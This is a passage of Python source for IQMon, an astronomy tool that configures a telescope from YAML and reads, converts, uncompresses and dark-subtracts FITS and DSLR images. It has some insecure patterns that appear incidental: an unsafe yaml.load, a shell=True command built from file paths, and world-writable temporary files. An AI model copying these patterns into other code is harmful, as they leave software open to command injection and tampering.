file is read. The configuration file is a\n YAML formatted text file which can contain the following entries:\n\n name : string containing the name of the telescope\n\n logs_file_path : the path in to which log files will be written\n\n plot_file_path : the path in to which the plots (e.g. 
those from the\n image.make_PSF_plot() or image.make_zero_point_plot() methods) will\n be written.\n\n temp_file_path : the path used for temporary files created by the\n program\n\n mongo_address : string containing the address to connecto to the mongo\n server which, if used, will contain a database of image analysis\n results.\n\n mongo_port : integer containing the port number of the mongo server\n\n mongo_db : string containing the name of the mongo database to use\n\n mongo_collection : string containing the name of the mongo collection to\n use\n\n pixel_scale : float containing the pixel scale in arcseconds per pixel.\n If either the pixel_scale or both the focal_length and pixel_size\n are required to be in the configuration file.\n\n focal_length : interger containing the focal length of the telescope in\n mm. This is used in estimating the pixel scale prior to plate\n solving.\n\n pixel_size : float containing the size of a pixel in microns. This is\n used in estimating the pixel scale prior to plate solving.\n\n gain : float with the estimated gain (electroncs per ADU) of the\n detector. This value is used by source extractor. If it is not\n present a default value of 1.0 will be used.\n\n saturation : float with the saturation level of the detector in ADU.\n This is used in optionally marking saturated pixels in the jpegs\n made by the make_JPEG() method of the Image object.\n\n threshold_FWHM : float value (in units of pixels) with the threshold\n FWHM value. If the image FWHM is above this value, the FWHM flag\n will be set.\n\n threshold_pointing_err : float value (in units of arcmin) with the\n threshold pointing error. If the pointing error is above this\n value, the pointing error flag will be set.\n\n threshold_ellipticity : float value (unitless) with the threshold\n ellipticity. If the ellipticity is above this value, the\n ellipticity flag will be set.\n\n threshold_zeropoint : float value (in magnitudes) with the threshold\n zero point. If the zero point is above this value, the zero point\n flag will be set.\n\n units_for_FWHM : The units which will be used when displaying the FWHM\n value on the web page. Also often used by customized scripts for\n displaying IQMon results.\n\n ROI : string representing the region of interest in pixels which the\n image should be cropped to. Format is \"[x1:x2,y1:y2]\" where x1 is\n the minimum x pixel, x2 is the maximum x pixel, y1 is the minimum y\n pixel, and y2 is the maximum y pixel. All pixel values will be\n forced to integers.\n\n PSF_measurement_radius : Radius in pixels of central region for which\n the image quality measurements of stars are used in determining the\n image FWHM and ellipticity. This parameter allows the user to\n ignore the corners of the image if they wish to ignore the optical\n aberrations in that region.\n\n pointing_marker_size : Diameter (in arcminutes) of the pointing marker\n symbol on the image jpegs generated by the make_JPEG() method.\n\n SExtractor_params : Dictionary of source extractor parameters to be used\n when source extractor is called. 
For example, when you want to set\n the CATALOG_TYPE to FITS_LDAC, use {'CATALOG_TYPE': 'FITS_LDAC'}.\n\n SCAMP_params : Dictionary of SCAMP parameters to be used when SCAMP is\n called.\n\n catalog : Dictionary containing information about the stellar catalog\n which is matched to the detected stars to determine the zero point.\n The get_catalog() method will query Vizier using these parameters.\n \n name : The name of the catalog which will be passed to a\n astroquery.vizier.Vizier() instance.\n \n columns : List of the column names to retrieve. Defaults to\n ['_RAJ2000','_DEJ2000','UCAC4','Bmag','Vmag','gmag','rmag','imag']\n if the catalog is UCAC4.\n \n magmax : Maximum magnitude to retrieve.\n \n Remaining parameters are the dictionary which link the filter names\n in the fits header to the filter names in the Vizier catalog that is\n retrieved. For example, if I want to compare the source extractor\n catalog with the UCAC4 catalog limited to stars brighter than\n magnitude 15 and I want to compare the 'rmag' filter magnitudes from\n the catalog to my images which have the FILTER header keyword set to\n 'PSr', then I would have a configuration file which contains the\n following:\n\n catalog:\n name: 'UCAC4'\n magmax: 15.0\n PSr: 'rmag'\n '''\n def __init__(self, config_file):\n self.site = ephem.Observer()\n\n ## Read YAML Config File\n config_file = os.path.expanduser(config_file)\n if not os.path.exists(config_file):\n raise TelescopeConfigError('Configuration file {} not found'.format(config_file))\n with open(config_file, 'r') as yaml_string:\n config = yaml.load(yaml_string)\n if not isinstance(config, dict):\n raise TelescopeConfigError('Configuration file contents not parsed as dict')\n self.config = config\n\n ## Populate Configured Properties\n if 'name' in config.keys():\n self.name = str(config['name'])\n else:\n self.name = 'telescope'\n\n if 'temp_file_path' in config.keys():\n self.temp_file_path = os.path.expanduser(config['temp_file_path'])\n else:\n self.temp_file_path = os.path.join('/', 'tmp')\n\n if 'plot_file_path' in config.keys():\n self.plot_file_path = os.path.expanduser(config['plot_file_path'])\n else:\n self.plot_file_path = os.path.join('/', 'tmp')\n\n if 'logs_file_path' in config.keys():\n self.logs_file_path = os.path.expanduser(config['logs_file_path'])\n else:\n self.logs_file_path = os.path.join('/', 'tmp')\n\n if 'mongo_address' in config.keys():\n self.mongo_address = config['mongo_address']\n else:\n self.mongo_address = None\n\n if 'mongo_port' in config.keys():\n self.mongo_port = config['mongo_port']\n else:\n self.mongo_port = 27017 ## Use default mongo port\n\n if 'mongo_db' in config.keys():\n self.mongo_db = config['mongo_db']\n else:\n self.mongo_db = None\n\n if 'mongo_collection' in config.keys():\n self.mongo_collection = config['mongo_collection']\n else:\n self.mongo_collection = None\n\n ## Define astropy.units Equivalency for Arcseconds and Pixels\n self.pixel_scale_equivalency = [(u.pix, u.arcsec,\n lambda pix: (pix*u.radian.to(u.arcsec) * self.pixel_size\\\n / self.focal_length).decompose().value,\n lambda arcsec: (arcsec/u.radian.to(u.arcsec) * self.focal_length\\\n / self.pixel_size).decompose().value\n )]\n\n if not 'pixel_scale' in config.keys():\n if ('focal_length' in config.keys()) and ('pixel_size' in config.keys()):\n self.focal_length = config['focal_length'] * u.mm\n self.pixel_size = config['pixel_size'] * u.um\n self.pixel_scale = self.pixel_size.to(u.mm)\\\n /self.focal_length.to(u.mm)\\\n 
*u.radian.to(u.arcsec)*u.arcsec/u.pix\n else:\n raise TelescopeConfigError('Configuration file does not contain\\\n information to determine pixel_scale')\n else:\n self.focal_length = None\n self.pixel_size = None\n self.pixel_scale = config['pixel_scale'] * u.arcsec/u.pix\n\n if 'latitude' in config.keys():\n self.latitude = float(config['latitude']) * u.deg\n else:\n self.latitude = None\n\n if 'longitude' in config.keys():\n self.longitude = float(config['longitude']) * u.deg\n else:\n self.longitude = None\n\n if 'altitude' in config.keys():\n self.altitude = float(config['altitude']) * u.meter\n else:\n self.altitude = None\n\n if 'gain' in config.keys():\n self.gain = config['gain'] / u.adu\n else:\n self.gain = 1.0 / u.adu\n\n if 'saturation' in config.keys():\n self.saturation = config['saturation'] * u.adu\n else:\n self.saturation = None\n\n if 'threshold_FWHM' in config.keys():\n self.threshold_FWHM = config['threshold_FWHM'] * u.pix\n else:\n self.threshold_FWHM = None\n\n if 'threshold_pointing_err' in config.keys():\n self.threshold_pointing_err = config['threshold_pointing_err'] * u.arcmin\n else:\n self.threshold_pointing_err = None\n\n if 'threshold_ellipticity' in config.keys():\n self.threshold_ellipticity = config['threshold_ellipticity']\n else:\n self.threshold_ellipticity = None\n\n if 'threshold_zeropoint' in config.keys():\n self.threshold_zeropoint = config['threshold_zeropoint'] * u.mag\n else:\n self.threshold_zeropoint = None\n\n if 'units_for_FWHM' in config.keys():\n self.units_for_FWHM = getattr(u, config['units_for_FWHM'])\n else:\n self.units_for_FWHM = u.pix\n\n if 'ROI' in config.keys():\n self.ROI = str(config['ROI'])\n else:\n self.ROI = None\n\n if 'PSF_measurement_radius' in config.keys():\n self.PSF_measurement_radius = config['PSF_measurement_radius'] * u.pix\n else:\n self.PSF_measurement_radius = None\n\n if 'pointing_marker_size' in config.keys():\n self.pointing_marker_size = config['pointing_marker_size'] * u.arcmin\n else:\n self.pointing_marker_size = 1 * u.arcmin\n\n if 'SExtractor_params' in config.keys():\n self.SExtractor_params = config['SExtractor_params']\n else:\n self.SExtractor_params = None\n\n if 'SCAMP_params' in config.keys():\n self.SCAMP_params = config['SCAMP_params']\n else:\n self.SCAMP_params = None\n\n if 'catalog' in config.keys():\n self.catalog_info = config['catalog']\n else:\n self.catalog_info = None\n\n ## create paths\n paths_to_check = []\n paths_to_create = []\n if self.temp_file_path: paths_to_check.append(self.temp_file_path)\n if self.plot_file_path: paths_to_check.append(self.plot_file_path)\n if self.logs_file_path: paths_to_check.append(self.logs_file_path)\n for path in paths_to_check:\n# print('Checking: {}'.format(path))\n while not os.path.exists(path):\n# print('Need to create: {}'.format(path))\n paths_to_create.append(path)\n path = os.path.split(path)[0]\n while len(paths_to_create) > 0:\n new_path = paths_to_create.pop()\n# print('Creating: {}'.format(new_path))\n os.mkdir(new_path)\n\n\n def __del__(self):\n pass\n# print('Deleted telescope object')\n\n def __enter__(self):\n return self\n\n def __exit__(self ,type, value, traceback):\n self.__del__()\n\n\n##-----------------------------------------------------------------------------\n## Define Image object which holds information and methods for analysis\n##-----------------------------------------------------------------------------\nclass Image(object):\n '''Object which represents a single image to be analyzed. 
When defined, the\n image objects requires a filename to a valid image (.fits or .cr2) file.\n \n Input\n -----\n file : The path to the file to be analyzed.\n \n tel : An IQMon.Telescope object which describes the telescope which took\n the image.\n '''\n def __init__(self, file, tel):\n self.start_process_time = datetime.datetime.now()\n file = os.path.expanduser(file)\n if os.path.exists(file):\n file_directory, filename = os.path.split(file)\n self.raw_file = file\n self.raw_file_name = filename\n self.raw_file_directory = file_directory\n self.raw_file_basename, self.file_ext = os.path.splitext(filename)\n else:\n self.raw_file = None\n self.raw_file_name = None\n self.raw_file_directory = None\n raise IOError(\"File {0} does not exist\".format(file))\n ## Confirm that input tel is an IQMon.Telescope object\n assert isinstance(tel, Telescope)\n import copy\n self.tel = copy.deepcopy(tel)\n ## Initialize values to None\n self.logger = None\n self.working_file = None\n self.header = None\n self.exptime = None\n self.catalog_filter = None\n self.object_name = None\n self.image_WCS = None\n self.astrometry_solved = None\n self.coordinate_of_center_pixel = None\n self.coordinate_from_header = None\n self.n_stars_SExtracted = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n self.temp_files = []\n self.SExtractor_catalogfile = None\n self.SExtractor_results = None\n self.position_angle = None\n self.zero_point = None\n self.zero_point_mode = None\n self.zero_point_median = None\n self.zero_point_average = None\n self.zero_point_correlation = None\n self.zero_point_plotfile = None\n self.total_process_time = None\n self.FWHM = None\n self.FWHM_median = None\n self.FWHM_mode = None\n self.FWHM_average = None\n self.ellipticity = None\n self.ellipticity_median = None\n self.ellipticity_mode = None\n self.ellipticity_average = None\n self.PSF_plot_file = None\n self.pointing_error = None\n self.image_flipped = None\n self.jpeg_file_names = []\n self.cropped = False\n self.crop_x1 = None\n self.crop_x2 = None\n self.crop_y1 = None\n self.crop_y2 = None\n self.original_nXPix = None\n self.original_nYPix = None\n self.SCAMP_catalog = None\n self.SCAMP_successful = False\n self.catalog_name = None\n self.catalog_data = None\n self.flags = {\n 'FWHM': False,\\\n 'ellipticity': False,\\\n 'pointing error': False,\\\n 'zero point': False,\\\n 'blank': False,\\\n }\n\n def __del__(self):\n# print('Deleting object referring to {}'.format(self.raw_file_name))\n if self.logger:\n self.logger = None\n if self.temp_files:\n for item in self.temp_files:\n if os.path.exists(item):\n# print(\" Deleting {0}\".format(item))\n os.remove(item)\n\n def __enter__(self):\n return self\n\n def __exit__(self ,type, value, traceback):\n logging.shutdown()\n self.__del__()\n\n\n ##-------------------------------------------------------------------------\n ## Make Logger Object\n ##-------------------------------------------------------------------------\n def get_logger(self, logger):\n '''Add an existing logger object to the Image object. 
Use this if\n calling from another program which has its own logger object, pass\n that logger to IQMon with this method.\n \n Parameters\n ----------\n logger : logging.logger object\n The logger which you wish to use with this image.\n '''\n self.logger = logger\n\n ## Print Configuration to Log\n self.logger.debug('Using configuration:')\n for entry in self.tel.config.keys():\n self.logger.debug(' {} = {}'.format(entry, self.tel.config[entry]))\n\n\n def make_logger(self, logfile=None, clobber=False, verbose=False, nofile=False):\n '''Create a logger object to use with this image. The logger object\n will be available as self.logger.\n \n Parameters\n ----------\n logfile : file to write log to\n \n clobber : defaults to False. If clobber is True, the old log file will\n be deleted.\n \n verbose : Defaults to False. If verbose is true, it sets the logging\n level to DEBUG (otherwise level is INFO).\n '''\n self.logger = logging.getLogger(self.raw_file_basename.replace('.', '_'))\n if len(self.logger.handlers) == 0:\n self.logger.setLevel(logging.DEBUG)\n LogFormat = logging.Formatter('%(asctime)23s %(levelname)8s: %(message)s')\n ## Log to a file\n if not nofile:\n if not logfile:\n logfile = os.path.join(self.tel.logs_file_path, '{}_IQMon.log'.format(self.raw_file_basename))\n self.logfile = logfile\n self.logfilename = os.path.split(self.logfile)[1]\n if clobber:\n if os.path.exists(logfile): os.remove(logfile)\n LogFileHandler = logging.FileHandler(logfile)\n LogFileHandler.setLevel(logging.DEBUG)\n LogFileHandler.setFormatter(LogFormat)\n self.logger.addHandler(LogFileHandler)\n ## Log to console\n LogConsoleHandler = logging.StreamHandler(stream=sys.stdout)\n if verbose:\n LogConsoleHandler.setLevel(logging.DEBUG)\n else:\n LogConsoleHandler.setLevel(logging.INFO)\n LogConsoleHandler.setFormatter(LogFormat)\n self.logger.addHandler(LogConsoleHandler)\n\n ## Put initial lines in log\n self.logger.info(\"###### Processing Image {} ######\".format(self.raw_file_name))\n self.logger.info('IQMon version = {}'.format(__version__))\n\n ## Print Configuration to Log\n if 'name' in self.tel.config.keys():\n self.logger.debug('Using configuration for telescope: {}'.format(self.tel.config['name']))\n else:\n self.logger.debug('Using configuration:')\n for entry in self.tel.config.keys():\n self.logger.debug(' {} = {}'.format(entry, self.tel.config[entry]))\n\n\n ##-------------------------------------------------------------------------\n ## Read Header\n ##-------------------------------------------------------------------------\n def read_header(self):\n '''Reads information from the image fits header and stores values as\n properties of itself. 
File must have a .fts, .fits, or .fit extension.\n '''\n start_time = datetime.datetime.now()\n if self.file_ext.lower() not in ['.fts', '.fits', '.fit']:\n self.logger.warning('Can not read fits header from non-fits file.')\n return False\n self.logger.info(\"Reading image header.\")\n if not self.working_file:\n with fits.open(self.raw_file, ignore_missing_end=True) as hdulist:\n self.header = hdulist[0].header\n self.nYPix, self.nXPix = hdulist[0].data.shape\n self.logger.debug(' Image size is: {},{}'.format(\\\n self.nXPix, self.nYPix))\n else:\n with fits.open(self.working_file, ignore_missing_end=True) as hdulist:\n self.header = hdulist[0].header\n self.nYPix, self.nXPix = hdulist[0].data.shape\n self.logger.debug(' Image size is: {},{}'.format(\\\n self.nXPix, self.nYPix))\n\n ## Get exposure time from header (assumes seconds)\n try:\n self.exptime = float(self.header['EXPTIME']) * u.s\n except:\n self.exptime = None\n self.logger.debug(\" No exposure time value found in header\")\n else:\n self.logger.debug(\" Exposure time = {0:.1f} s\".format(\\\n self.exptime.to(u.s).value))\n ## Get filter from header\n try:\n self.filter = str(self.header['FILTER'])\n except:\n self.filter = None\n self.logger.debug(\" No filter value found in header\")\n else:\n self.logger.debug(\" filter = {}\".format(self.filter))\n ## Get object name from header\n try:\n self.object_name = self.header[\"OBJECT\"]\n except:\n self.object_name = None\n self.logger.debug(\" No object value found in header\")\n else:\n self.logger.debug(\" Header object name = {0}\".format(\n self.object_name))\n ## Get Observation Date and Time from header\n ## (assumes YYYY-MM-DDTHH:MM:SS format)\n try:\n self.observation_date = self.header[\"DATE-OBS\"]\n except:\n self.observation_date = None\n self.logger.debug(\" No date value found in header\")\n else:\n self.logger.debug(\" Header date = {0}\".format(self.observation_date))\n\n if not self.tel.latitude:\n ## Get Site Latitude from header (assumes decimal degrees)\n try:\n self.latitude = self.header[\"LAT-OBS\"] * u.deg\n except:\n self.latitude = None\n self.logger.debug(\" No latitude value found in header\")\n else:\n self.logger.debug(\" Header latitude = {0:.4f} deg\".format(\\\n self.latitude.to(u.deg).value))\n else:\n self.latitude = self.tel.latitude\n\n if not self.tel.longitude:\n ## Get Site Longitude from header (assumes decimal degrees)\n try:\n self.longitude = self.header[\"LONG-OBS\"] * u.deg\n except:\n self.longitude = None\n self.logger.debug(\" No longitiude value found in header\")\n else:\n self.logger.debug(\" Header longitiude = {0:.4f} deg\".format(\\\n self.longitude.to(u.deg).value))\n else:\n self.longitude = self.tel.longitude\n\n if not self.tel.altitude:\n ## Get Site Altitude from header (assumes meters)\n try:\n self.altitude = self.header[\"ALT-OBS\"] * u.meter\n except:\n self.altitude = None\n self.logger.debug(\" No altitude value found in header\")\n else:\n self.logger.debug(\" Header altitude = {0:.0f} meters\".format(\\\n self.altitude.to(u.meter).value))\n else:\n self.altitude = self.tel.altitude\n\n ## Read Header Coordinates in to astropy coordinates object\n self.coordinate_from_header = None\n if ('RA' in self.header.keys()) and ('DEC' in self.header.keys()):\n ## Header RA is : separated\n coord_string = '{} {}'.format(self.header['RA'], self.header['DEC'])\n self.logger.debug(' Parsing: \"{}\" as hours and degrees'.format(coord_string))\n try:\n self.coordinate_from_header = coords.SkyCoord(coord_string,\\\n 
unit=(u.hour, u.degree),\\\n frame='icrs')\n except:\n self.logger.debug(' Parsing: \"{}\" as hours and degrees failed'.format(coord_string))\n \n if not self.coordinate_from_header:\n self.logger.info(' Could not parse coordinate strings from header')\n self.logger.info(' RA = {}'.format(self.header['RA']))\n self.logger.info(' DEC = {}'.format(self.header['DEC']))\n\n ## Read WCS\n try:\n self.image_WCS = wcs.WCS(self.header)\n except:\n self.image_WCS = None\n self.logger.info(\" No WCS found in image header\")\n else:\n self.logger.debug(\" Found WCS in image header.\")\n for item in self.image_WCS.to_header().cards:\n self.logger.debug(' {}'.format(item))\n\n ## Determine PA of Image\n# if self.image_WCS:\n# self.orientation_from_wcs()\n# if self.position_angle:\n# self.logger.debug(\" Position angle of WCS is {0:.1f} deg\".format(\\\n# self.position_angle.to(u.deg).value))\n# if self.image_flipped:\n# self.logger.debug(\" Image is mirrored.\")\n\n ## Determine Alt, Az, Moon Sep, Moon Illum using ephem module\n if self.observation_date and self.latitude and self.longitude and self.coordinate_from_header:\n ## Populate site object properties\n SiteDate = \"/\".join(self.observation_date[0:10].split(\"-\"))\n SiteTime = self.observation_date[11:] \n self.tel.site.date = ephem.Date(SiteDate+\" \"+SiteTime)\n self.tel.site.lat = str(self.latitude.to(u.deg).value)\n self.tel.site.lon = str(self.longitude.to(u.deg).value)\n if self.altitude:\n self.tel.site.elevation = self.altitude.to(u.meter).value\n ## Do calculations using ephem\n RADEC_string = ','.join(self.coordinate_from_header.to_string('hmsdms', sep=':').split())\n TargetObject = ephem.readdb(\"Target,f|M|F7,{},2.02,2000\".format(RADEC_string))\n TargetObject.compute(self.tel.site)\n self.target_alt = TargetObject.alt * 180./ephem.pi * u.deg\n self.target_az = TargetObject.az * 180./ephem.pi * u.deg\n self.logger.debug(\" Target Alt, Az = {0:.1f}, {1:.1f}\".format(\\\n self.target_alt.to(u.deg).value,\\\n self.target_az.to(u.deg).value))\n self.target_zenith_angle = 90.*u.deg - self.target_alt\n self.airmass = 1.0/math.cos(self.target_zenith_angle.to(u.radian).value)\\\n * (1.0 - 0.0012*(1.0/(math.cos(\\\n self.target_zenith_angle.to(u.radian).value)**2 - 1.0)))\n self.logger.debug(\" Target airmass (calculated) = {0:.2f}\".format(\\\n self.airmass))\n ## Calculate Moon Position and Illumination\n TheMoon = ephem.Moon()\n TheMoon.compute(self.tel.site)\n self.moon_phase = TheMoon.phase\n self.moon_sep = ephem.separation(TargetObject, TheMoon)\n self.moon_sep = self.moon_sep * 180./ephem.pi * u.deg\n self.moon_alt = TheMoon.alt * 180./ephem.pi * u.deg\n if self.moon_alt > 0:\n self.logger.debug(\" A {0:.0f} percent illuminated Moon is {1:.0f} deg from target.\".format(\\\n self.moon_phase,\\\n self.moon_sep.to(u.deg).value))\n else:\n self.logger.debug(\" A {0:.0f} percent illuminated Moon is down.\".format(\\\n self.moon_phase))\n else:\n self.target_alt = None\n self.target_az = None\n self.moon_phase = None\n self.moon_sep = None\n self.moon_alt = None\n self.target_zenith_angle = None\n self.airmass = None\n self.logger.warning(\"Object and Moon positions not calculated.\")\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done reading image header in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Edit Header\n ##-------------------------------------------------------------------------\n 
def edit_header(self, keyword, value, comment=None):\n '''Edit a single keyword in the image fits header. File must have a\n .fts, .fits, or .fit extension.\n \n Input\n -----\n keyword : a string representing a valid FITS keyword.\n \n value : The value to enter for that keyword.\n \n Parameters\n ----------\n comment : comment string for the keyword entry\n '''\n if self.file_ext.lower() not in ['.fts', '.fits', '.fit']:\n self.logger.warning('Can not read fits header from non-fits file.')\n return False\n self.logger.info('Editing image header: {} = {}'.format(keyword, value))\n with fits.open(self.working_file, ignore_missing_end=True, mode='update') as hdulist:\n hdulist[0].header[keyword] = value\n if comment:\n hdulist[0].header.comments[keyword] = comment\n hdulist.flush()\n\n\n ##-------------------------------------------------------------------------\n ## Uncompress image\n ##-------------------------------------------------------------------------\n def uncompress(self, timeout=20):\n '''Method to use funpack to uncompress a compressed fits image. File\n must have a .fts, .fits, or .fit extension.\n\n Parameters\n ----------\n timeout : int, optional\n Seconds before the command is considered frozen and the process call\n times out. Default is 20.\n '''\n if not self.working_file:\n self.logger.warning('Must have working file to uncompress file')\n return False\n if self.file_ext.lower() not in ['.fts', '.fits', '.fit']:\n self.logger.warning('Can funpack a non-fits file.')\n return False\n\n try:\n result = subprocess.check_output(['fpack', '-L', self.working_file], timeout=timeout)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('fpack timed out')\n return False\n except:\n self.logger.warning('Could not run fpack to check compression status')\n return False\n\n found_compression_info = False\n for line in result.split('\\n'):\n regexp = '\\s*\\d+\\s+IMAGE\\s+([\\w/=\\.]+)\\s(BITPIX=[\\-\\d]+)\\s(\\[.*\\])\\s([\\w]+)'\n IsMatch = re.match(regexp, line)\n if IsMatch:\n self.logger.debug(' fpack -L Output: {}'.format(line))\n if re.search('not_tiled', IsMatch.group(4)) and\\\n not re.search('no_pixels', IsMatch.group(3)):\n self.logger.debug(' Image is not compressed')\n found_compression_info = True\n elif re.search('tiled_rice', IsMatch.group(4)):\n self.logger.debug(' Image is rice compressed. Running funpack.')\n found_compression_info = True\n if not found_compression_info:\n self.logger.warning('Could not determine compression status')\n else:\n try:\n subprocess.call(['funpack', '-F', self.working_file], timeout=timeout)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('funpack timed out')\n except:\n self.logger.warning('Failed to run funpack')\n\n ##-------------------------------------------------------------------------\n ## Read Image\n ##-------------------------------------------------------------------------\n def read_image(self, timeout=20):\n '''Read the raw image and write out a working image in the IQMon\n temporary directory.\n \n If the raw file is a fits file (.fit, .fts, or .fits extension), the\n working file will be standardized to have a .fits file extension\n \n If the raw file is a fits file and is found to be fpack compressed,\n the working file will be uncompressed.\n \n If the raw file is a DSLR raw file (.cr2 or .dng), then the working file\n will be converted to a fits file. 
First, dcraw is called to convert to\n a .ppm file using the -4 option which forces a linear conversion (no\n gamma correction) of the pixel values to 16 bit integers. Then the .ppm\n file is ocnverted to a fits image using either the pamtofits or\n pnmtofits tools. The final fits file will be three dimensional with the\n third dimension being the color channels (R, G, B).\n \n Parameters\n ----------\n timeout : int, optional\n Seconds before the command is considered frozen and the process call\n times out. Default is 20.\n '''\n start_time = datetime.datetime.now()\n chmod_code = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH\n if self.working_file:\n if os.path.exists(self.working_file): os.remove(self.working_file)\n ## fts extension: make working copy and rename to .fits\n if self.file_ext in ['.fts', '.fit']:\n self.logger.info('Making working copy of raw image: {}'.format(\\\n self.raw_file_name))\n self.working_file = os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+'.fits')\n# shutil.copy2(self.raw_file, self.working_file)\n subprocess.call(['cp', self.raw_file, self.working_file], timeout=timeout)\n os.chmod(self.working_file, chmod_code)\n self.temp_files.append(self.working_file)\n self.file_ext = '.fits'\n self.uncompress()\n ## fits extension: make working copy\n elif self.file_ext == '.fits':\n self.logger.info('Making working copy of raw image: {}'.format(\\\n self.raw_file_name))\n self.working_file = os.path.join(self.tel.temp_file_path,\\\n self.raw_file_name)\n shutil.copy2(self.raw_file, self.working_file)\n os.chmod(self.working_file, chmod_code)\n self.temp_files.append(self.working_file)\n self.file_ext = '.fits'\n self.uncompress()\n ## DSLR file: convert to fits\n elif self.file_ext.lower() in ['.dng', '.cr2']:\n self.logger.info('Converting {} to fits format'.format(\\\n self.raw_file_name))\n ## Make copy of raw file\n self.working_file = os.path.join(self.tel.temp_file_path, self.raw_file_name)\n self.logger.debug('Copying {} to {}'.format(self.raw_file, self.working_file))\n shutil.copy2(self.raw_file, self.working_file)\n self.logger.debug('Setting working file permissions for {}'.format(self.working_file))\n os.chmod(self.working_file, chmod_code)\n self.temp_files.append(self.working_file)\n ## Use dcraw to convert to ppm file\n command = ['dcraw', '-t', '2', '-4', self.working_file]\n self.logger.debug('Executing dcraw: {}'.format(repr(command)))\n subprocess.call(command, timeout=timeout)\n ppm_file = os.path.join(self.tel.temp_file_path, self.raw_file_basename+'.ppm')\n if os.path.exists(ppm_file):\n self.working_file = ppm_file\n self.temp_files.append(self.working_file)\n else:\n self.logger.critical('dcraw failed. 
Could not find ppm file.')\n ## Use pamtofits to convert to fits file\n fits_file = os.path.join(self.tel.temp_file_path, self.raw_file_basename+'.fits')\n if os.path.exists(fits_file): os.remove(fits_file)\n conversion_tools = ['pamtofits', 'pnmtofits']\n for conversion_tool in conversion_tools:\n if not os.path.exists(fits_file):\n command = '{} {} > {}'.format(conversion_tool, self.working_file, fits_file)\n self.logger.debug('Trying {}: {}'.format(conversion_tool, command))\n try:\n subprocess.call(command, shell=True, timeout=timeout)\n except:\n pass\n if os.path.exists(fits_file):\n self.working_file = fits_file\n self.file_ext = self.file_ext = os.path.splitext(self.working_file)[1]\n self.temp_files.append(self.working_file)\n else:\n self.logger.critical('PPM to fits conversion failed. Could not find fits file.')\n ## Write new fits file with only green image\n self.logger.debug('Only keeping green channel for analysis')\n with fits.open(self.working_file, 'update') as hdulist:\n if len(hdulist) == 1:\n data = hdulist[0].data\n green_data = data[1]\n hdulist[0].data = green_data\n hdulist.flush()\n else:\n self.logger.warning('Unrecognixed file extension: {}'.format(\\\n self.file_ext))\n self.working_file = os.path.join(self.tel.temp_file_path,\\\n self.raw_file_name)\n raise IOError('Unrecognixed file extension: {}'.format(self.file_ext))\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done making working copy of image in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Dark Subtract Image\n ##-------------------------------------------------------------------------\n def dark_subtract(self, Darks):\n '''Create a master dark and subtract from image.\n\n Input\n -----\n Darks : list or string\n If a list of filenames is provided, then the fits files listed will\n be read in and median combined to form a master dark file. If only\n a single filename is provided, then that will be treated as the\n master dark file. The master dark is then subtracted from the\n working file.\n '''\n start_time = datetime.datetime.now()\n self.logger.info(\"Dark subtracting image.\")\n self.logger.debug(\" Opening image data.\")\n with fits.open(self.working_file, mode='update') as hdulist_image:\n ## Load master dark if provided, but if multiple files input, combine\n ## them in to master dark, then load combined master dark.\n if type(Darks) == str:\n if os.path.exists(Darks):\n self.logger.debug(\" Found master dark. Opening master dark data.\")\n with fits.open(Darks) as hdulist_dark:\n MasterDarkData = hdulist_dark[0].data\n else:\n self.logger.warning(' Could not find master dark {}'.format(Darks))\n return False\n elif type(Darks) == list:\n if len(Darks) == 0:\n self.logger.warning(' No input darks found')\n return False\n if len(Darks) == 1:\n if os.path.exists(Darks[0]):\n self.logger.debug(\" Found master dark. 
Opening master dark data.\")\n with fits.open(Darks[0]) as hdulist_dark:\n MasterDarkData = hdulist_dark[0].data\n else:\n self.logger.warning(' Could not find master dark {}'.format(Darks[0]))\n return False\n else:\n self.logger.info(\" Median combining {0} darks.\".format(len(Darks)))\n ## Combine multiple darks frames\n DarkData = []\n for Dark in Darks:\n with fits.open(Dark) as hdulist:\n DarkData.append(hdulist[0].data)\n DarkData = np.array(DarkData)\n MasterDarkData = np.median(DarkData, axis=0)\n ## Save Master Dark to Fits File\n DataPath = os.path.split(self.raw_file)[0]\n DataNightString = os.path.split(DataPath)[1]\n MasterDarkFilename = 'MasterDark_{}_{}_{}.fits'.format(\\\n self.tel.name,\\\n DataNightString,\\\n str(int(math.floor(self.exptime.to(u.s).value)))\n )\n MasterDarkFile = os.path.join(self.tel.temp_file_path,\\\n MasterDarkFilename)\n hdu_MasterDark = fits.PrimaryHDU(MasterDarkData)\n hdulist_MasterDark = fits.HDUList([hdu_MasterDark])\n hdulist_MasterDark.header = hdulist[0].header\n hdulist_MasterDark.header['history'] = \\\n \"Combined {0} images to make this master dark.\".format(\\\n len(Darks))\n self.logger.debug(\" Writing master dark file: {0}\".format(\\\n MasterDarkFile))\n hdulist_MasterDark.writeto(MasterDarkFile)\n else:\n self.logger.error(\" Could not find master dark file(s) {}\".format(Darks))\n return False\n\n ## Now Subtract MasterDark from Image\n self.logger.debug(\" Subtracting dark from image.\")\n ImageData = hdulist_image[0].data\n DifferenceImage = ImageData - MasterDarkData\n hdulist_image[0].data = DifferenceImage\n hdulist_image.flush()\n self.logger.debug(\" Median level of image = {0}\".format(\n np.median(ImageData)))\n self.logger.debug(\" Median level of dark = {0}\".format(\\\n np.median(MasterDarkData)))\n self.logger.debug(\" Median level of dark subtracted = {0}\".format(\\\n np.median(DifferenceImage)))\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done with dark subtraction in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Crop Image\n ##-------------------------------------------------------------------------\n def crop(self):\n '''\n Crop working image to region of interest.\n '''\n if self.tel.ROI:\n MatchROI = re.match(\"\\[?(\\d{1,6}):(\\d{1,6}),(\\d{1,6}):(\\d{1,6})\\]?\",\\\n self.tel.ROI)\n if MatchROI:\n self.logger.info('Cropping image to {}'.format(self.tel.ROI))\n\n crop_x1 = int(MatchROI.group(1))\n crop_x2 = 